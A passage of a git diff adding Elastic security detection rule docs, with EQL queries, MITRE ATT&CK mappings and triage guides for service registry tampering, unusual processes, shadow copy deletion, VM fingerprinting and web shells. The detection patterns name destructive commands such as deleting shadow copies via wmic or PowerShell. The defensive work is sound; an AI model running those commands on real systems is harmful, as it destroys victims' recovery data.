"HKLM\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet*\\Services\\*\\ServiceDLL", + "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet*\\Services\\*\\ImagePath" + ) and not registry.data.strings : ( + "?:\\windows\\system32\\Drivers\\*.sys", + "\\SystemRoot\\System32\\drivers\\*.sys", + "\\??\\?:\\Windows\\system32\\Drivers\\*.SYS", + "system32\\DRIVERS\\USBSTOR") and + not (process.name : "procexp??.exe" and registry.data.strings : "?:\\*\\procexp*.sys") and + not process.executable : ( + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\System32\\svchost.exe", + "?:\\Windows\\winsxs\\*\\TiWorker.exe", + "?:\\Windows\\System32\\drvinst.exe", + "?:\\Windows\\System32\\services.exe", + "?:\\Windows\\System32\\msiexec.exe", + "?:\\Windows\\System32\\regsvr32.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc new file mode 100644 index 0000000000..296d650759 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc @@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host]] +=== Unusual Process Spawned by a Host + +A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc new file mode 100644 index 0000000000..7a88a914f7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc @@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process]] +=== Unusual Process Spawned by a Parent Process + +A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc new file mode 100644 index 0000000000..72a9485a20 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc @@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user]] +=== Unusual Process Spawned by a User + +A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/problemchild +* https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Living off the Land Attack Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Defense Evasion + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc new file mode 100644 index 0000000000..12603fcc9d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device]] +=== Unusual Process Writing Data to an External Device + +A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-2h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Physical Medium +** ID: T1052 +** Reference URL: https://attack.mitre.org/techniques/T1052/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc new file mode 100644 index 0000000000..fdd74db5f3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc @@ -0,0 +1,107 @@ +[[prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service]] +=== Unusual Service Host Child Process - Childless Service + +Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "svchost.exe" and + + /* based on svchost service arguments -s svcname where the service is known to be childless */ + + process.parent.args : ("WdiSystemHost","LicenseManager", + "StorSvc","CDPSvc","cdbhsvc","BthAvctpSvc","SstpSvc","WdiServiceHost", + "imgsvc","TrkWks","WpnService","IKEEXT","PolicyAgent","CryptSvc", + "netprofm","ProfSvc","StateRepository","camsvc","LanmanWorkstation", + "NlaSvc","EventLog","hidserv","DisplayEnhancementService","ShellHWDetection", + "AppHostSvc","fhsvc","CscService","PushToInstall") and + + /* unknown FPs can be added here */ + + not process.name : ("WerFault.exe","WerFaultSecure.exe","wermgr.exe") and + not (process.executable : "?:\\Windows\\System32\\RelPost.exe" and process.parent.args : "WdiSystemHost") and + not (process.name : "rundll32.exe" and + process.args : "?:\\WINDOWS\\System32\\winethc.dll,ForceProxyDetectionOnNextRun" and process.parent.args : "WdiServiceHost") and + not (process.executable : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*", "?:\\Windows\\System32\\Kodak\\kds_i4x50\\lib\\lexexe.exe") and + process.parent.args : "imgsvc") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Process Hollowing +** ID: T1055.012 +** Reference URL: https://attack.mitre.org/techniques/T1055/012/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Process Hollowing +** ID: T1055.012 +** Reference URL: https://attack.mitre.org/techniques/T1055/012/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc new file mode 100644 index 0000000000..09d15add19 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc @@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id]] +=== Unusual User Privilege Enumeration via id + +This rule monitors for a sequence of 20 "id" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the "id" command to enumerate the privileges of all users present on the system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name == "id" and process.args_count == 2 and + not (process.parent.name == "rpm" or process.parent.args : "/var/tmp/rpm-tmp*")] with runs=20 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Owner/User Discovery +** ID: T1033 +** Reference URL: https://attack.mitre.org/techniques/T1033/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc new file mode 100644 index 0000000000..443b3e1f90 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc @@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-virtual-machine-fingerprinting]] +=== Virtual Machine Fingerprinting + +An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:(start or process_started) and + process.args:("/sys/class/dmi/id/bios_version" or + "/sys/class/dmi/id/product_name" or + "/sys/class/dmi/id/chassis_vendor" or + "/proc/scsi/scsi" or + "/proc/ide/hd0/model") and + not user.name:root + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Information Discovery +** ID: T1082 +** Reference URL: https://attack.mitre.org/techniques/T1082/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc new file mode 100644 index 0000000000..4f5cebc4b9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell]] +=== Volume Shadow Copy Deletion via PowerShell + +Identifies the use of the Win32_ShadowCopy class and related cmdlets to achieve shadow copy deletion. This commonly occurs in tandem with ransomware or other destructive attacks. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/previous-versions/windows/desktop/vsswmi/win32-shadowcopy +* https://powershell.one/wmi/root/cimv2/win32_shadowcopy +* https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Volume Shadow Copy Deletion via PowerShell + +The Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders. + +A typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring. + +This rule monitors the execution of PowerShell cmdlets to interact with the Win32_ShadowCopy WMI class, retrieve shadow copy objects, and delete them. + +#### Possible investigation steps + +- Investigate the program execution chain (parent process tree). +- Check whether the account is authorized to perform this operation. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- If unsigned files are found on the process tree, retrieve them and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Use process name, command line, and file hash to search for occurrences in other hosts. +- Check if any files on the host machine have been encrypted. + + +### False positive analysis + +- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of user and command line conditions. + +### Related rules + +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Priority should be given due to the advanced stage of this activity on the attack. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- If data was encrypted, deleted, or modified, activate your data recovery plan. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and + process.args : ("*Get-WmiObject*", "*gwmi*", "*Get-CimInstance*", "*gcim*") and + process.args : ("*Win32_ShadowCopy*") and + process.args : ("*.Delete()*", "*Remove-WmiObject*", "*rwmi*", "*Remove-CimInstance*", "*rcim*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc new file mode 100644 index 0000000000..e593ed906a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc @@ -0,0 +1,138 @@ +[[prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic]] +=== Volume Shadow Copy Deletion via WMIC + +Identifies use of wmic.exe for shadow copy deletion on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Volume Shadow Copy Deletion via WMIC + +The Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders. + +A typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring. + +This rule monitors the execution of `wmic.exe` to interact with VSS via the `shadowcopy` alias and delete parameter. + +#### Possible investigation steps + +- Investigate the program execution chain (parent process tree). +- Check whether the account is authorized to perform this operation. +- Contact the account owner and confirm whether they are aware of this activity. +- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB. +- Investigate other alerts associated with the user/host during the past 48 hours. +- If unsigned files are found on the process tree, retrieve them and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Use process name, command line, and file hash to search for occurrences in other hosts. +- Check if any files on the host machine have been encrypted. + + +### False positive analysis + +- This rule has chances of producing benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of user and command line conditions. + +### Related rules + +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Priority should be given due to the advanced stage of this activity on the attack. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- If data was encrypted, deleted, or modified, activate your data recovery plan. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "WMIC.exe" or process.pe.original_file_name == "wmic.exe") and + process.args : "delete" and process.args : "shadowcopy" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc new file mode 100644 index 0000000000..476474ef1c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc @@ -0,0 +1,157 @@ +[[prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes]] +=== Web Shell Detection: Script Process Child of Common Web Processes + +Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/ +* https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965 +* https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Initial Access +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Web Shell Detection: Script Process Child of Common Web Processes + +Adversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a web script that is placed on an openly accessible web server to allow an adversary to use the web server as a gateway into a network. A web shell may provide a set of functions to execute or a command-line interface on the system that hosts the web server. + +This rule detects a web server process spawning script and command-line interface programs, potentially indicating attackers executing commands using the web shell. + +#### Possible investigation steps + +- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any other spawned child processes. +- Examine the command line to determine which commands or scripts were executed. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be 